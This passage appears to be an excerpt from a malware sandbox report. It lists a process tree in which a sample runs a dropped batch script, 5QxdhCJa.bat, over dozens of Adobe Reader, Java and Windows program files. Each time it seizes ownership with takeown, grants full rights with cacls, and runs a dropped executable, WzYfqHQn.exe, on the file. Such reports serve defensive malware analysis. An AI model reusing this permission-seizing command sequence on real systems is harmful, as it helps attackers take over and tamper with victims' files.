- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1520
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
  2⤵
  - Loads dropped DLL
  PID:2612
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
    3⤵
    PID:3932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
    3⤵
    PID:4284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "ENUtxt.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2032
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "ENUtxt.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:5024
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
  2⤵
  PID:4904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
    3⤵
    PID:3924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
    3⤵
    - Modifies file permissions
    PID:1732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "DefaultID.pdf" -nobanner
    3⤵
    PID:4620
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "DefaultID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:3672
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
  2⤵
  - Loads dropped DLL
  PID:4272
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
    3⤵
    PID:2068
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
    3⤵
    PID:672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "AdobeID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3008
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "AdobeID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:2180
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1828
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
  2⤵
  - Loads dropped DLL
  PID:2084
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
    3⤵
    - Modifies file permissions
    PID:2900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1528
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:564
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
  2⤵
  - Loads dropped DLL
  PID:1920
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
    3⤵
    - Loads dropped DLL
    PID:4904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
    3⤵
    PID:2496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "StandardBusiness.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2360
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "StandardBusiness.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1800
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:2972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:5064
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"
    3⤵
    - Executes dropped EXE
    PID:2404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2252
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:4776
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1768
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\de-DE\jnwmon.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:2924
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2920
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\jnwmon.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:940
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "jnwmon.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2736
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:2508
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3088
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3148
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3184
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\fr-FR\jnwdui.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:2992
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\jnwdui.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3248
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2648
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3832
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\it-IT\MSPVWCTL.DLL.mui""
  2⤵
  - Loads dropped DLL
  PID:1404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:2056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\MSPVWCTL.DLL.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3864
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1208
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2344
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\Journal.exe""
  2⤵
  - Loads dropped DLL
  PID:1752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Journal.exe" /E /G Admin:F /C
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Journal.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "Journal.exe" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1936
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "Journal.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:1792
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2100
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp""
  2⤵
  - Loads dropped DLL
  PID:1916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Seyes.jtp" /E /G Admin:F /C
    3⤵
    PID:2268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Seyes.jtp"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "Seyes.jtp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:856
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "Seyes.jtp" -nobanner
      4⤵
      Executes dropped EXE
      PID:1692
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4912
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:4224
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4784
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4376
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3128
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3024
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:4972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3176
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3944
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5000
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4072
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  - Loads dropped DLL
  PID:4724
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:4016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3312
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4804
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3260
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""
  2⤵
  - Loads dropped DLL
  PID:3372
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C
    3⤵
    PID:4848
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"
    3⤵
    - Modifies file permissions
    PID:4876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "license.html" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3364
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "license.html" -nobanner
      4⤵
      Executes dropped EXE
      PID:3320
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3344
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""
  2⤵
  - Loads dropped DLL
  PID:4928
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C
    3⤵
    PID:4908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "add_reviewer.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1020
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "add_reviewer.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:3464
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3368
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""
  2⤵
  - Loads dropped DLL
  PID:3452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C
    3⤵
    PID:4680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"
    3⤵
    PID:4684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "forms_received.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1676
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "forms_received.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:4020
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3504
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""
  2⤵
  - Loads dropped DLL
  PID:3520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C
    3⤵
    PID:4056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"
    3⤵
    - Modifies file permissions
    PID:2240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "reviews_super.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3952
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "reviews_super.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:4004
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3900
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""
  2⤵
  - Loads dropped DLL
  PID:296
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"
    3⤵
    PID:3416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "submission_history.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4064
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "submission_history.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:3412
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3928
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""
  2⤵
  - Loads dropped DLL
  PID:4000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C
    3⤵
    PID:784
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "Identity-H" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1536
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "Identity-H" -nobanner
      4⤵
      Executes dropped EXE
      PID:3340
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4100
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""
  2⤵
  - Loads dropped DLL
  PID:1104
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:4136
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"
    3⤵
    PID:4208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "MinionPro-Regular.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4188
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "MinionPro-Regular.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:4252
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""
  2⤵
  - Loads dropped DLL
  PID:4220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C
    3⤵
    PID:4240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"
    3⤵
    PID:4256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "ZY______.PFB" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4048
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "ZY______.PFB" -nobanner
      4⤵
      Executes dropped EXE
      PID:4288
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4516
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""
  2⤵
  - Loads dropped DLL
  PID:4300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C
    3⤵
    PID:4352
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"
    3⤵
    PID:4432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "brt32.clx" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4444
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "brt32.clx" -nobanner
      4⤵
      Executes dropped EXE
      PID:4436
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4344
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""
  2⤵
  - Loads dropped DLL
  PID:4408
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C
    3⤵
    PID:4380
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"
    3⤵
